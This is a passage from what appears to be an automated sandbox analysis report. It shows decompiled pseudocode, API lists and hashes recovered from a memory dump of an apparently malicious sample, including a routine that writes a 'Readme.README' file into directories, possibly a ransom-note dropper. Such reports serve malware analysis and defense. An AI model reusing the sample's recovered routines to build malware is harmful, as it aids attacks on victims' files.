                    0x01408d92
                    0x01408d98
                    0x01408dab
                    0x01408db9
                    0x01408dc1
                    0x01408ddc
                    0x00000000
                    0x01408dde
                    0x01408dde
                    0x01408de9
                    0x01408df3
                    0x01408df3
                    0x01408dc3
                    0x01408dca
                    0x00000000
                    0x01408dcf
                    0x01408d9a
                    0x01408d9f
                    0x01408da5
                    0x01408da5
                    0x01408da7
                    0x01408dfd

                    APIs
                    • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,00000000,?,?,?,?,01408E2F,?,?,00000002,00000000), ref: 01408DB9
                    • GetLastError.KERNEL32(?,01408E2F,?,?,00000002,00000000,?,0140826D,?,00000000,00000000,00000002,?,?,?,?), ref: 01408DC3
                    • __dosmaperr.LIBCMT ref: 01408DCA
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ErrorFileLastPointer__dosmaperr
                    • String ID:
                    • API String ID: 2336955059-0
                    • Opcode ID: 1fc540336f193ba43415e0ac10aec0a5a8056f054f8ca3a3a37361988d83801d
                    • Instruction ID: ecbfec5571651025b12fd30a4de2ed7f70e2f036fcab1cc70c17f1be194fb3b6
                    • Opcode Fuzzy Hash: 1fc540336f193ba43415e0ac10aec0a5a8056f054f8ca3a3a37361988d83801d
                    • Instruction Fuzzy Hash: EA012832A1011A6BCB178FEADC448AE7B29DFD5230B34031AE9119B2E0EA71DC039790
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E013FEB5D(WCHAR* _a4, WCHAR* _a8) {
                    				int _t3;
                    
                    				_t3 = MoveFileExW(_a4, _a8, 2); // executed
                    				if(_t3 != 0) {
                    					return 0;
                    				} else {
                    					return E013FDB04(GetLastError()) | 0xffffffff;
                    				}
                    			}




                    0x013feb6a
                    0x013feb72
                    0x013feb89
                    0x013feb74
                    0x013feb85
                    0x013feb85

                    APIs
                    • MoveFileExW.KERNEL32(000000FF,01415DA7,00000002,?,013C68A5,?,?,?,00000043,00000043,01415DA7,000000FF), ref: 013FEB6A
                    • GetLastError.KERNEL32(?,013C68A5,?,?,?,00000043,00000043,01415DA7,000000FF), ref: 013FEB74
                    • __dosmaperr.LIBCMT ref: 013FEB7B
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ErrorFileLastMove__dosmaperr
                    • String ID:
                    • API String ID: 2142343326-0
                    • Opcode ID: b2645c225e75f69a3707cc39b057ef08723d73d2698733c64eb9250edcac2f54
                    • Instruction ID: b65273ba8d8895b960cbe1580122cd2e873295d66a33f1f9c36545fcbd041124
                    • Opcode Fuzzy Hash: b2645c225e75f69a3707cc39b057ef08723d73d2698733c64eb9250edcac2f54
                    • Instruction Fuzzy Hash: 88D05E3210510877CB201EF5AC0CD163B199B41378B204115F72C851A1DA36C810C610
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 60%
                    			E013C9F85(void* __edx, intOrPtr _a4) {
                    				intOrPtr _v8;
                    				char _v16;
                    				signed int _v20;
                    				short _v4116;
                    				char _v4292;
                    				char _v4308;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t19;
                    				signed int _t20;
                    				intOrPtr _t30;
                    				void* _t34;
                    				void* _t38;
                    				void* _t47;
                    				intOrPtr* _t52;
                    				signed int _t55;
                    
                    				_t47 = __edx;
                    				_push(0xffffffff);
                    				_push(E01416127);
                    				_push( *[fs:0x0]);
                    				E013F2860();
                    				_t19 =  *0x1435234; // 0x78d9f939
                    				_t20 = _t19 ^ _t55;
                    				_v20 = _t20;
                    				_push(_t20);
                    				 *[fs:0x0] =  &_v16;
                    				wsprintfW( &_v4116, L"%s\\Readme.README", _a4);
                    				E013F5890(0,  &_v4308, 0, 0xc0);
                    				_push(1);
                    				E013C28D3( &_v4308);
                    				_v8 = 0;
                    				E013C71BF( &_v4308, _t47, 0,  &_v4116, 0x22, 0x40);
                    				_t52 =  *0x1435074; // 0x141bc40
                    				_t10 = _t52 + 1; // 0x141bc41
                    				_t38 = _t10;
                    				do {
                    					_t30 =  *_t52;
                    					_t52 = _t52 + 1;
                    					_t59 = _t30;
                    				} while (_t30 != 0);
                    				_push(0);
                    				_push(0);
                    				_push(0); // executed
                    				E013C8014( &_v4292, _t59); // executed
                    				_push(0);
                    				_push(_t52 - _t38);
                    				_push( *0x1435074);
                    				E013C853F( &_v4292, _t59);
                    				E013C65F9( &_v4308, _t59);
                    				_t34 = E013C4020( &_v4308);
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_t34, _v20 ^ _t55);
                    			}



















                    0x013c9f85
                    0x013c9f88
                    0x013c9f8a
                    0x013c9f95
                    0x013c9f9b
                    0x013c9fa0
                    0x013c9fa5
                    0x013c9fa7
                    0x013c9fac
                    0x013c9fb0
                    0x013c9fc6
                    0x013c9fdb
                    0x013c9fe9
                    0x013c9feb
                    0x013c9ffa
                    0x013ca004
                    0x013ca009
                    0x013ca00f
                    0x013ca00f
                    0x013ca012
                    0x013ca012
                    0x013ca014
                    0x013ca015
                    0x013ca015
                    0x013ca019
                    0x013ca01a
                    0x013ca023
                    0x013ca024
                    0x013ca029
                    0x013ca02a
                    0x013ca02b
                    0x013ca037
                    0x013ca042
                    0x013ca04d
                    0x013ca055
                    0x013ca06c

                    APIs
                    • wsprintfW.USER32(?,%s\Readme.README,?,78D9F939,00000000,00000000,00000043,01416127,000000FF,?,013C975D,00000043), ref: 013C9FC6
                      • Part of subcall function 013C28D3: __EH_prolog3.LIBCMT ref: 013C28DA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3wsprintf
                    • String ID: %s\Readme.README
                    • API String ID: 3269967010-1742281136
                    • Opcode ID: 0204d6cda3180bcddb033e6e6465c406d3dd1af8e6f067edfd033486898847b9
                    • Instruction ID: 448dc4d5e412671f17829e4633d7f1a13c1c7b0581657889c0dbad0c1212914f
                    • Opcode Fuzzy Hash: 0204d6cda3180bcddb033e6e6465c406d3dd1af8e6f067edfd033486898847b9
                    • Instruction Fuzzy Hash: 17219571900299ABCB20DF59DC44FEBBB78FB54B44F00019DF64A97184DB716A44CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 66%
                    			E013C5C8B(void* __ebx, char* __ecx, void* __edi, void* __esi, signed int _a4, char _a8) {
                    				signed int _t11;
                    				void* _t12;
                    				intOrPtr _t14;
                    				void* _t18;
                    				signed int _t21;
                    				signed int _t29;
                    
                    				_t17 = __ecx;
                    				_push(__esi);
                    				_t21 = _a4;
                    				if(_t21 > 0xfffffffe) {
                    					_push("string too long");
                    					_t12 = E013F0F81(_t18, __edi, _t21, __eflags);
                    					asm("int3");
                    					asm("lock inc dword [ecx+0x4]");
                    					return _t12;
                    				} else {
                    					if( *((intOrPtr*)(__ecx + 0x14)) >= _t21) {
                    						__eflags = _a8;
                    						if(_a8 == 0) {
                    							L6:
                    							__eflags = _t21;
                    							if(_t21 == 0) {
                    								 *(_t17 + 0x10) =  *(_t17 + 0x10) & _t21;
                    								__eflags =  *((intOrPtr*)(_t17 + 0x14)) - 0x10;
                    								if( *((intOrPtr*)(_t17 + 0x14)) >= 0x10) {
                    									_t17 =  *_t17;
                    								}
                    								 *_t17 = 0;
                    								goto L10;
                    							}
                    						} else {
                    							__eflags = _t21 - 0x10;
                    							if(_t21 >= 0x10) {
                    								goto L6;
                    							} else {
                    								_t14 =  *((intOrPtr*)(__ecx + 0x10));
                    								__eflags = _t21 - _t14;
                    								_t15 =  <  ? _t21 : _t14;
                    								_t11 = E013C6118(__ecx, 1,  <  ? _t21 : _t14);
                    								goto L10;
                    							}
                    						}
                    					} else {
                    						_push( *((intOrPtr*)(__ecx + 0x10)));
                    						_push(_t21); // executed
                    						_t11 = E013C5927(__ebx, __ecx); // executed
                    						L10:
                    						_t29 = _t21;
                    					}
                    					return _t11 & 0xffffff00 | _t29 != 0x00000000;
                    				}
                    			}









                    0x013c5c8b
                    0x013c5c8e
                    0x013c5c8f
                    0x013c5c95
                    0x013c5ce0
                    0x013c5ce5
                    0x013c5cea
                    0x013c5ceb
                    0x013c5cef
                    0x013c5c97
                    0x013c5c9a
                    0x013c5ca7
                    0x013c5cab
                    0x013c5cc4
                    0x013c5cc4
                    0x013c5cc6
                    0x013c5cc8
                    0x013c5ccb
                    0x013c5ccf
                    0x013c5cd1
                    0x013c5cd1
                    0x013c5cd3
                    0x00000000
                    0x013c5cd3
                    0x013c5cad
                    0x013c5cad
                    0x013c5cb0
                    0x00000000
                    0x013c5cb2
                    0x013c5cb2
                    0x013c5cb5
                    0x013c5cb7
                    0x013c5cbd
                    0x00000000
                    0x013c5cbd
                    0x013c5cb0
                    0x013c5c9c
                    0x013c5c9c
                    0x013c5c9f
                    0x013c5ca0
                    0x013c5cd6
                    0x013c5cd6
                    0x013c5cd6
                    0x013c5cdd
                    0x013c5cdd

                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 013C5CE5
                      • Part of subcall function 013C5927: __EH_prolog3_catch.LIBCMT ref: 013C592E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3_catchXinvalid_argumentstd::_
                    • String ID: string too long
                    • API String ID: 4202626062-2556327735
                    • Opcode ID: 7464fd1a34e84ab68ab86d3e5f3a955a49e288d9da23f7892d21b2330d3e27ab
                    • Instruction ID: 9b2a14d61171cddbd44004918754187b590de1c6c43c39003c8936747e496bc9
                    • Opcode Fuzzy Hash: 7464fd1a34e84ab68ab86d3e5f3a955a49e288d9da23f7892d21b2330d3e27ab
                    • Instruction Fuzzy Hash: 0FF0F431A00720ABDF269A1C84406A97A54AF11E2DF34C69EE9515E1C2C362EC82C7D2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E013C8305(void* __ecx, void* __edi) {
                    				signed int _t60;
                    				signed int _t63;
                    				signed int _t64;
                    				void* _t73;
                    				signed int _t75;
                    				signed int _t85;
                    				void* _t93;
                    				void* _t94;
                    				void* _t95;
                    				signed int _t98;
                    				intOrPtr _t102;
                    				signed int _t111;
                    				signed char* _t113;
                    				void* _t120;
                    				intOrPtr _t121;
                    				void* _t122;
                    
                    				_t114 = __edi;
                    				_t94 = __ecx;
                    				_push(0x30);
                    				E013F26F6(E01415FEE);
                    				_t93 = _t94;
                    				_t60 =  *(_t93 + 0x1c);
                    				_t95 =  *_t60;
                    				if(_t95 == 0) {
                    					L3:
                    					if( *((intOrPtr*)(_t93 + 0x4c)) != 0) {
                    						E013C60BF(_t93);
                    						if( *((intOrPtr*)(_t93 + 0x38)) != 0) {
                    							 *((intOrPtr*)(_t122 - 0x18)) = 0xf;
                    							 *((intOrPtr*)(_t122 - 0x1c)) = 0;
                    							 *((char*)(_t122 - 0x2c)) = 0;
                    							_push( *((intOrPtr*)(_t93 + 0x4c)));
                    							 *((intOrPtr*)(_t122 - 4)) = 0;
                    							_t63 = E013FDFFD();
                    							_t98 = _t63;
                    							_t64 = _t63 | 0xffffffff;
                    							 *(_t122 - 0x3c) = _t64;
                    							while(_t98 != _t64) {
                    								E013C6296(_t93, _t122 - 0x2c, _t112, _t114, 1, _t98);
                    								_t114 =  >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c;
                    								_t117 =  >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c;
                    								_t112 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x38))));
                    								_t71 =  *((intOrPtr*)(_t122 - 0x1c)) + ( >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c);
                    								_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x38)))) + 0x18))(_t93 + 0x40,  >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c,  *((intOrPtr*)(_t122 - 0x1c)) + ( >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c), _t122 - 0x30, _t122 - 0x11, _t122 - 0x10, _t122 - 0x34);
                    								if(_t73 >= 0) {
                    									if(_t73 <= 1) {
                    										if( *((intOrPtr*)(_t122 - 0x34)) != _t122 - 0x11) {
                    											_t79 =  >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c;
                    											_t102 =  *((intOrPtr*)(_t122 - 0x30));
                    											_t120 =  *((intOrPtr*)(_t122 - 0x1c)) - _t102 + ( >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c);
                    											if(_t120 > 0) {
                    												while(1) {
                    													_push( *((intOrPtr*)(_t93 + 0x4c)));
                    													_t120 = _t120 - 1;
                    													_push( *((char*)(_t120 + _t102)));
                    													E013FEAED();
                    													if(_t120 <= 0) {
                    														goto L14;
                    													}
                    													_t102 =  *((intOrPtr*)(_t122 - 0x30));
                    												}
                    											}
                    											goto L14;
                    										} else {
                    											_t106 =  >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c;
                    											_t83 =  *((intOrPtr*)(_t122 - 0x30)) - ( >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c);
                    											E013C6DE5(_t122 - 0x2c, 0,  *((intOrPtr*)(_t122 - 0x30)) - ( >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c));
                    											goto L20;
                    										}
                    										L26:
                    									} else {
                    										if(_t73 == 3) {
                    											if( *((intOrPtr*)(_t122 - 0x1c)) < 1) {
                    												L20:
                    												_push( *((intOrPtr*)(_t93 + 0x4c)));
                    												_t85 = E013FDFFD();
                    												_t98 = _t85;
                    												_t64 = _t85 | 0xffffffff;
                    												continue;
                    											} else {
                    												_t87 =  >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c;
                    												E013C880D(_t122 - 0x11, 1,  >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c, 1);
                    												L14:
                    												_t64 =  *(_t122 - 0x11) & 0x000000ff;
                    												L15:
                    												 *(_t122 - 0x3c) = _t64;
                    											}
                    										}
                    									}
                    								}
                    								E013C6118(_t122 - 0x2c, 1, 0);
                    								_t75 =  *(_t122 - 0x3c);
                    								goto L17;
                    							}
                    							goto L15;
                    						} else {
                    							 *(_t122 - 0x35) = 0;
                    							_t60 = E013C2207(_t122 - 0x35,  *((intOrPtr*)(_t93 + 0x4c))); // executed
                    							if(_t60 == 0) {
                    								goto L4;
                    							} else {
                    								_t75 =  *(_t122 - 0x35) & 0x000000ff;
                    							}
                    						}
                    					} else {
                    						L4:
                    						_t75 = _t60 | 0xffffffff;
                    					}
                    				} else {
                    					_t112 =  *((intOrPtr*)(_t93 + 0x2c));
                    					_t121 =  *_t112;
                    					_t60 = _t121 + _t95;
                    					if(_t95 >= _t60) {
                    						goto L3;
                    					} else {
                    						 *_t112 = _t121 - 1;
                    						_t111 =  *(_t93 + 0x1c);
                    						_t113 =  *_t111;
                    						 *_t111 =  &(_t113[1]);
                    						_t75 =  *_t113 & 0x000000ff;
                    					}
                    				}
                    				L17:
                    				return E013F26B1(_t75);
                    				goto L26;
                    			}



















                    0x013c8305
                    0x013c8305
                    0x013c8305
                    0x013c830c
                    0x013c8311
                    0x013c8313
                    0x013c8316
                    0x013c831a
                    0x013c833f
                    0x013c8343
                    0x013c834f
                    0x013c8359
                    0x013c8379
                    0x013c8380
                    0x013c8383
                    0x013c8386
                    0x013c8389
                    0x013c838c
                    0x013c8392
                    0x013c8394
                    0x013c8397
                    0x013c845c
                    0x013c83a5
                    0x013c83b7
                    0x013c83be
                    0x013c83c3
                    0x013c83d4
                    0x013c83dc
                    0x013c83e1
                    0x013c83e6
                    0x013c8431
                    0x013c8470
                    0x013c8474
                    0x013c8479
                    0x013c847d
                    0x013c847f
                    0x013c847f
                    0x013c8482
                    0x013c8487
                    0x013c8488
                    0x013c8491
                    0x00000000
                    0x00000000
                    0x013c8497
                    0x013c8497
                    0x013c847f
                    0x00000000
                    0x013c8433
                    0x013c843d
                    0x013c8441
                    0x013c8449
                    0x00000000
                    0x013c8449
                    0x00000000
                    0x013c83e8
                    0x013c83eb
                    0x013c83f1
                    0x013c844e
                    0x013c844e
                    0x013c8451
                    0x013c8457
                    0x013c8459
                    0x00000000
                    0x013c83f3
                    0x013c83fc
                    0x013c8407
                    0x013c840f
                    0x013c840f
                    0x013c8413
                    0x013c8413
                    0x013c8413
                    0x013c83f1
                    0x013c83eb
                    0x013c83e6
                    0x013c841d
                    0x013c8422
                    0x00000000
                    0x013c8422
                    0x00000000
                    0x013c835b
                    0x013c835e
                    0x013c8365
                    0x013c836e
                    0x00000000
                    0x013c8370
                    0x013c8370
                    0x013c8370
                    0x013c836e
                    0x013c8345
                    0x013c8345
                    0x013c8345
                    0x013c8345
                    0x013c831c
                    0x013c831c
                    0x013c831f
                    0x013c8321
                    0x013c8326
                    0x00000000
                    0x013c8328
                    0x013c832b
                    0x013c832d
                    0x013c8330
                    0x013c8335
                    0x013c8337
                    0x013c8337
                    0x013c8326
                    0x013c8425
                    0x013c842a
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3_
                    • String ID:
                    • API String ID: 2427045233-0
                    • Opcode ID: bd2b005df423bcefe151cf5841811300f04adcdf62b7e5bf0c1f5aab0d3ca993
                    • Instruction ID: 3de7389c3104aa47a1a072feec72208066e27bd654951dcf7dd625808fa1c053
                    • Opcode Fuzzy Hash: bd2b005df423bcefe151cf5841811300f04adcdf62b7e5bf0c1f5aab0d3ca993
                    • Instruction Fuzzy Hash: D2513E71E0410ADFCF15DFA8D8909EEB7B9AF48714F1081AEE921B7291DB71EA44CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E0140758B() {
                    				signed int _t20;
                    				signed int _t22;
                    				long _t23;
                    				signed int _t25;
                    				void* _t28;
                    				signed int _t31;
                    				void* _t33;
                    
                    				_t31 = 0;
                    				do {
                    					_t20 = _t31 & 0x0000003f;
                    					_t33 = _t20 * 0x30 +  *((intOrPtr*)(0x143a740 + (_t31 >> 6) * 4));
                    					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
                    						 *(_t33 + 0x28) = 0x81;
                    						_t22 = _t31;
                    						if(_t22 == 0) {
                    							_push(0xfffffff6);
                    						} else {
                    							if(_t22 == 1) {
                    								_push(0xfffffff5);
                    							} else {
                    								_push(0xfffffff4);
                    							}
                    						}
                    						_pop(_t23);
                    						_t28 = GetStdHandle(_t23);
                    						if(_t28 == 0xffffffff || _t28 == 0) {
                    							_t25 = 0;
                    						} else {
                    							_t25 = GetFileType(_t28); // executed
                    						}
                    						if(_t25 == 0) {
                    							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
                    							 *(_t33 + 0x18) = 0xfffffffe;
                    							_t20 =  *0x143a398; // 0xb00378
                    							if(_t20 != 0) {
                    								_t20 =  *(_t20 + _t31 * 4);
                    								 *(_t20 + 0x10) = 0xfffffffe;
                    							}
                    						} else {
                    							_t20 = _t25 & 0x000000ff;
                    							 *(_t33 + 0x18) = _t28;
                    							if(_t20 != 2) {
                    								if(_t20 == 3) {
                    									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
                    								}
                    							} else {
                    								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
                    							}
                    						}
                    					} else {
                    						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
                    					}
                    					_t31 = _t31 + 1;
                    				} while (_t31 != 3);
                    				return _t20;
                    			}










                    0x01407590
                    0x01407592
                    0x01407596
                    0x0140759f
                    0x014075aa
                    0x014075ba
                    0x014075be
                    0x014075c1
                    0x014075d3
                    0x014075c3
                    0x014075c6
                    0x014075cf
                    0x014075c8
                    0x014075c8
                    0x014075ca
                    0x014075c6
                    0x014075d5
                    0x014075dd
                    0x014075e2
                    0x014075f1
                    0x014075e8
                    0x014075e9
                    0x014075e9
                    0x014075f5
                    0x01407615
                    0x01407619
                    0x01407620
                    0x01407627
                    0x01407629
                    0x0140762c
                    0x0140762c
                    0x014075f7
                    0x014075f7
                    0x014075fc
                    0x01407602
                    0x0140760d
                    0x0140760f
                    0x0140760f
                    0x01407604
                    0x01407604
                    0x01407604
                    0x01407602
                    0x014075b2
                    0x014075b2
                    0x014075b2
                    0x01407633
                    0x01407634
                    0x01407640

                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 014075D7
                    • GetFileType.KERNEL32(00000000), ref: 014075E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: FileHandleType
                    • String ID:
                    • API String ID: 3000768030-0
                    • Opcode ID: dc39b36a37075e5077c7f7df35fb29a5e0cce641552b2a2bc613ebe000463cdc
                    • Instruction ID: 0c30020e627716d65828c2b63327cf88734bdb664b15d18256de3cc7c72c21d0
                    • Opcode Fuzzy Hash: dc39b36a37075e5077c7f7df35fb29a5e0cce641552b2a2bc613ebe000463cdc
                    • Instruction Fuzzy Hash: 6C11933150878186D733493F8C88663BE959786172B280B3BD1F786BF1D635F5839682
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E013C57A6(intOrPtr __ebx, signed int _a4, signed int _a8, char _a12) {
                    				char _v20;
                    				char _v36;
                    				void* __esi;
                    				signed int _t19;
                    				signed int _t20;
                    				signed int _t22;
                    				signed int _t24;
                    				signed int _t37;
                    				signed int _t39;
                    				intOrPtr _t41;
                    				signed int _t42;
                    				signed int _t43;
                    				signed int _t44;
                    				signed int _t50;
                    				signed int _t51;
                    				signed int _t52;
                    				void* _t56;
                    				void* _t58;
                    				void* _t62;
                    
                    				_t41 = __ebx;
                    				_t56 = _t62;
                    				_t42 = _a4;
                    				if(_t42 != 0) {
                    					_t20 = _t19 | 0xffffffff;
                    					_t50 = _t20 % _a8;
                    					__eflags = _t20 / _a8 - _t42;
                    					if(_t20 / _a8 >= _t42) {
                    						_t43 = _t42 * _a8;
                    						__eflags = _a12;
                    						if(__eflags == 0) {
                    							L10:
                    							_t22 = E013F21A5(__eflags, _t43); // executed
                    							_pop(_t44);
                    							__eflags = _t22;
                    							if(_t22 == 0) {
                    								goto L8;
                    							} else {
                    								return _t22;
                    							}
                    						} else {
                    							__eflags = _t43 - 0x1000;
                    							if(__eflags < 0) {
                    								goto L10;
                    							} else {
                    								_t10 = _t43 + 0x23; // 0x33
                    								_t28 = _t10;
                    								__eflags = _t10 - _t43;
                    								if(__eflags <= 0) {
                    									goto L3;
                    								} else {
                    									_t37 = E013F21A5(__eflags, _t28); // executed
                    									_t44 = _t37;
                    									__eflags = _t44;
                    									if(_t44 != 0) {
                    										_t11 = _t44 + 0x23; // 0x23
                    										_t39 = _t11 & 0xffffffe0;
                    										__eflags = _t39;
                    										 *(_t39 - 4) = _t44;
                    										return _t39;
                    									} else {
                    										L8:
                    										_push(_t51);
                    										_t52 = _t51 ^ _t51;
                    										E013FD9E6(_t44, _t52, _t52, _t52, _t52, _t52, _t52);
                    										_push(_t52);
                    										_push(_t52);
                    										_push(_t52);
                    										_push(_t52);
                    										_push(_t52);
                    										L16();
                    										asm("int3");
                    										_t24 = IsProcessorFeaturePresent(0x17);
                    										__eflags = _t24;
                    										if(_t24 != 0) {
                    											_push(5);
                    											asm("int 0x29");
                    										}
                    										_push(_t52);
                    										E013FD897(_t41, _t50, 0xc0000417, 2, 0xc0000417, 1);
                    										return TerminateProcess(GetCurrentProcess(), 0xc0000417);
                    									}
                    								}
                    							}
                    						}
                    					} else {
                    						L3:
                    						_push(_t56);
                    						_t58 = _t62;
                    						E013F0EB6( &_v20);
                    						E013F4EC6( &_v20, 0x1431644);
                    						asm("int3");
                    						_push(_t58);
                    						E013F3420( &_v36);
                    						E013F4EC6( &_v36, 0x1433704);
                    						asm("int3");
                    						__eflags =  *0x143aa64; // 0x0
                    						_t18 = __eflags != 0;
                    						__eflags = _t18;
                    						return 0 | _t18;
                    					}
                    				} else {
                    					return 0;
                    				}
                    			}






















                    0x013c57a6
                    0x013c57a7
                    0x013c57a9
                    0x013c57ae
                    0x013c57b4
                    0x013c57b9
                    0x013c57bc
                    0x013c57be
                    0x013c57c5
                    0x013c57c9
                    0x013c57cd
                    0x013c57fb
                    0x013c57fc
                    0x013c5801
                    0x013c5802
                    0x013c5804
                    0x00000000
                    0x013c5806
                    0x013c5807
                    0x013c5807
                    0x013c57cf
                    0x013c57cf
                    0x013c57d5
                    0x00000000
                    0x013c57d7
                    0x013c57d7
                    0x013c57d7
                    0x013c57da
                    0x013c57dc
                    0x00000000
                    0x013c57de
                    0x013c57df
                    0x013c57e5
                    0x013c57e7
                    0x013c57e9
                    0x013c57f0
                    0x013c57f3
                    0x013c57f3
                    0x013c57f6
                    0x013c57fa
                    0x013c57eb
                    0x013c57eb
                    0x013fda73
                    0x013fda74
                    0x013fda7b
                    0x013fda83
                    0x013fda84
                    0x013fda85
                    0x013fda86
                    0x013fda87
                    0x013fda88
                    0x013fda8d
                    0x013fda90
                    0x013fda95
                    0x013fda97
                    0x013fda99
                    0x013fda9c
                    0x013fda9c
                    0x013fda9e
                    0x013fdaa9
                    0x013fdac0
                    0x013fdac0
                    0x013c57e9
                    0x013c57dc
                    0x013c57d5
                    0x013c57c0
                    0x013c57c0
                    0x013f3465
                    0x013f3466
                    0x013f346e
                    0x013f347c
                    0x013f3481
                    0x013f3482
                    0x013f348b
                    0x013f3499
                    0x013f349e
                    0x013f34a1
                    0x013f34a7
                    0x013f34a7
                    0x013f34aa
                    0x013f34aa
                    0x013c57b0
